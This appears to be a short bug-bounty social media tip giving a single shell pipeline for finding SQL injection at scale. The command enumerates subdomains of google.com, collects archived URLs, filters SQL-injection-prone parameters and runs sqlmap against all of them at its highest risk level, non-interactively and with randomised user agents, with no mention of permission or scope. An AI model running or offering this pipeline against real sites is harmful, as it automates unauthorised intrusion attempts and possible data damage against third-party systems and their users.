How to find sqli at scale with sqlmap:
subfinder -d
google.com -silent -all | gau --blacklist ttf,woff,svg,png | sort -u | gf sqli > gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli_report.txt
#SQLInjection #WebAppHacking #BugBounty